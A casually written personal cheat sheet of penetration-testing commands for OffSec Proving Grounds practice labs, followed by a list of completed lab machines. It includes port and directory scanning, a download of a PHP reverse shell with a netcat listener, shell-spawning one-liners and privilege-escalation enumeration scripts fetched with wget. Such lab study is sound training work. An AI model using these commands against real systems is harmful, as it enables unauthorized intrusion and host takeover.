             /~~88b                     888  e88~-_           
     e88~~\ |   888 888-~88e-~88e  e88~\888 d888     888-~88e 
    d888    `  d88P 888  888  888 d888  888 8888~~\  888  888 
    8888      d88P  888  888  888 8888  888 8888   | 888  888  
    Y888     d88P   888  888  888 Y888  888 Y888   | 888  888 
.----"88__/ d88P___ 888  888  888  "88_/888  "88__/  888  888----.        
|             -->   Z2V0IG9mZiBteSBsYXduIQ==   <--               |      															    	     														
'----------------------------------------------------------------'                 
 juss sum notes to get me started haxin on offsec provin grounds.
  

nmap -sV -sC -p-  *host* 

----

this been workin gud fer most
gobuster -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 80 -x .html,.php dir -u http://*host*:*port*/

sometimes need to define status codes to exclude. 
-b "302,301"
or
specify status codes to accept
-s "204,301,302,307,401,403"  

nikto -h *host*

peep sum smb
enum4linux -a *host*

----

::phprev shell::
wget https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php
edit with host and nc port
nc -vnlp port

::spawn shell::
python -c 'import pty; pty.spawn("/bin/bash")'
python -c 'import pty; pty.spawn("/bin/sh")'
echo os.system('/bin/bash')
/bin/sh -i
perl -e 'exec "/bin/sh";'
ruby: exec "/bin/sh"
lua: os.execute('/bin/sh')
(From within vi)
:!bash
:set shell=/bin/bash:shell
(From within nmap)
!sh

if you wanna be fancy... pfft :P

export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/tmp     <-- make yo life mo easy 
export TERM=xterm-256color
alias ll='ls -lsaht --color=auto'
Ctrl + Z [Background Process]
stty raw -echo ; fg ; reset
stty columns 200 rows 200

----

find / -perm -u=s -type f 2>/dev/null     ....mmmm suids :P~'

::enum tools::
wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh

wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh

wget https://raw.githubusercontent.com/sleventyeleven/linuxprivchecker/master/linuxprivchecker.py

----

https://gtfobins.github.io  --  this sum magic

::this hoe happen sumtimes trying to run scipts::
/bin/bash^M: bad interpreter: No such file or directory

::this getchu gucci::
sed -i -e 's/\r$//' *file*


(73)
----
PLAY
::warm up labs completed::
BBSCute
CyberSploit1
Dawn
Dc-1
Dc-2
FunboxEasy
FunboxEasyEnum	
FunboxRookie
Gaara
Geisha	
Ha-natraj
Inclusiveness
InfosecPrep	
Katana	
Lampiao	
Monitoring
OnSystemShellDredd	
Photographer
Potato
PyExp
Sar	
Seppuku	
Shakabrah
Solstice
Sumo
SunsetDecoy
SunsetNoontide
Vegeta1
Wpwn

::get to work labs completed::
Assertion101
Born2Root
BtrSys2.1
Dc-4
Deception
Funbox
HAWordy
Loly
My-CMSMS
NoName
SoSimple
Stapler
SunsetMidnight
Tre
Y0usef

::try harder labs completed::

----

PRACTICE
::warm up labs completed::
Algernon
Bratarina
ClamAV
Exfiltrated
Exghost
Fantastic
Hawat
Helpdesk
Internal
Kevin
Metallus
Muddy
Pebbles
Pwned1
Twiggy
Wombo

::get to work labs completed::
Nibbles
Nukem
Pelican
Quackerjack
Roquefort
Snookums
Sorcerer
Walla
WebCal
XposedAPI
ZenPhoto
Zino

::try harder labs completed::
Sirol


    _ 													 
   [_] ..LéGO!!										     
 /;   :\												     
()'---' C													 
  | | |													 
  [=|=] 
